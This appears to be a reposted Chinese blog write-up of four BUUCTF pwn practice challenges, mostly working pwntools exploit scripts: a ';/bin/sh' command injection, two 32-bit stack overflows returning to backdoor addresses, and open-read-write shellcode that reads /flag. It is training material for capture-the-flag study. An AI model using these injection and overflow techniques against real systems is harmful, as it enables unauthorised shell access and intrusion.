PWN-PRACTICE-BUUCTF-11
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-11
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
PWN-PRACTICE-BUUCTF-11
- bjdctf_2020_router
- picoctf_2018_buffer overflow 1
- pwnable_orw
- wustctf2020_getshell
bjdctf_2020_router
Linux 系統(tǒng)可以在一個(gè)命令行上執(zhí)行多個(gè)命令:; --如果命令被分號(hào)(;)所分隔,那么命令會(huì)連續(xù)的執(zhí)行下去,就算是錯(cuò)誤的命令也會(huì)繼續(xù)執(zhí)行后面的命令&& --如果命令被 && 所分隔,那么命令也會(huì)一直執(zhí)行下去,但是中間有錯(cuò)誤的命令就不會(huì)執(zhí)行后面的命令,沒錯(cuò)就繼續(xù)執(zhí)行直至命令執(zhí)行完為止|| --如果命令被雙豎線 || 所分隔,那么一遇到可以執(zhí)行成功的命令就會(huì)停止執(zhí)行后面的命令,而不管后面的命令是否正確。如果執(zhí)行到錯(cuò)誤的命令就是繼續(xù)執(zhí)行后一個(gè)命令,直到遇到執(zhí)行到正確的命令或命令執(zhí)行完為止 from pwn import * #io=process('./bjdctf_2020_router') io=remote('node4.buuoj.cn',28754) io.recvuntil('choose:\n') io.sendline('1') io.recvuntil('address:\n') io.sendline(';/bin/sh') io.interactive()picoctf_2018_buffer overflow 1
32位elf的棧溢出,ret2text
from pwn import * #io=process('./PicoCTF_2018_buffer_overflow_1') io=remote('node4.buuoj.cn',25028) io.recvuntil('string: \n') payload='a'*(0x28+4)+p32(0x080485CB) io.sendline(payload) io.interactive()pwnable_orw
參考:BUUCTF:pwnable_orw
#coding:utf-8 from pwn import * context.arch = 'i386' io=remote('node4.buuoj.cn',29951) #io=process('./pwnable_orw') shellcode = shellcraft.open('/flag') #打開文件后,文件描述符賦給eax shellcode += shellcraft.read('eax','esp',100) shellcode += shellcraft.write(1,'esp',100) payload = asm(shellcode) io.send(payload) io.interactive()wustctf2020_getshell
32位elf的棧溢出,溢出8字節(jié)足以,返回到backdoor
from pwn import * #io=process('./wustctf2020_getshell') io=remote('node4.buuoj.cn',27941) payload='a'*(0x18+4)+p32(0x0804851B) io.sendline(payload) io.interactive()總結(jié)
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-11的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【JS 逆向百例】网洛者反爬练习平台第三
- 下一篇: PWN-COMPETITION-HGAM